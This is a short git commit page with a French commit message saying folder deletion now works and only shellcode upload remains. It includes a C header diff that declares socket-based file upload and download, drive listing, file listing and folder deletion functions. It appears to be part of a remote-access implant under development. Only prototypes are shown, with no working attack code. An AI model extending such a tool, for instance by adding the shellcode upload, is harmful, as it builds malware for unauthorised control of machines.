delete_folder marche

manque plus que l'upload de shellcode et on est bon !
This commit is contained in:
2023-02-21 19:01:37 +01:00
parent 0aa959640a
commit 72b4761011
6 changed files with 69 additions and 3 deletions

View File

@@ -16,6 +16,7 @@ extern API Api;
int get_object_info(char* path, struct stat* fileinfo);
int get_drives_list(char* buf);
BOOL delete_folder(LPCTSTR lpszDir);
char* get_file_list(const char* dirPath, int* numFiles);
int download_file(FILE* fp, SOCKET sock);
void upload_file(SOCKET sock, const char* path);